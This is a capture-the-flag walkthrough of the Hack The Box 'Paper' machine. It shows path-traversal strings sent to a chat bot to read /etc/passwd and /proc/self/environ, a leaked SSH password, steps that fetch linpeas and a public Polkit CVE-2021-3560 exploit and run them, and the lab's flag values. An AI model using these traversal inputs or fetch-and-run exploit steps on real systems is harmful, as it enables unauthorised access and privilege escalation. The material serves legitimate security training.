[Hack The Box] HTB—Paper

# [Hack The Box] HTB—Paper ## 1. Information gathering Let's begin by scanning ![](https://i.imgur.com/h6fZTnZ.png) Useful informations on port 22, 80 and 443. The rest are filtered ports! Let's check the hostname of the webserver through the response header $curl -I http://10.10.11.143 ![](https://i.imgur.com/D49MmSM.png) Let's map this hostname in `/etc/hosts` file and try to access the web server #/etc/hosts 10.10.11.143 office.paper ## 2. Website exploitation Let's open the website now ![](https://i.imgur.com/gh2WvOs.jpg) [Penetration Testing kit Add on](https://addons.mozilla.org/en-US/firefox/addon/penetration-testing-kit/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search) provided more details on its Tech Stack and many more. ![](https://i.imgur.com/sTQfI6I.png) Well, a new host! ![](https://i.imgur.com/vrdkuG7.jpg) Let's add it too #/etc/hosts 10.10.11.143 office.paper 10.10.11.143 chat.office.paper Let's access it now ![](https://i.imgur.com/tVyilWr.png) Let's create an account and login ![](https://i.imgur.com/zzOXXxp.png) recyclops file ../../../../../etc/passwd ![](https://i.imgur.com/u88spun.png) recyclops file ../../../../../proc/self/environ ![](https://i.imgur.com/X0onGXF.png) dwight/Queenofblad3s!23 Let's use this creds to have an ssh session on the system ssh dwight@10.10.11.143 one, two, three catched the user flag ![](https://i.imgur.com/BSq1wud.png) user flag:`0edf5f0f21681b3ccefb4151bd9e1eb3` ## 3. Privileges Escalation Let's download and execute our favorite Linux priviliges escalation tool wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64 Catched Polkit CVE ![](https://i.imgur.com/wPJJ8h3.png) CVE-2021-3560 poc https://github.com/Almorabea/Polkit-exploit Download and run the exploit on the machine ![](https://i.imgur.com/DCgCBPR.png) Got the root flag :100: ![](https://i.imgur.com/2FfXU4F.png) root flag: `f48bd0125f4411b932f0697bc8f4dff7` ![](https://i.imgur.com/1Zl9pVk.png)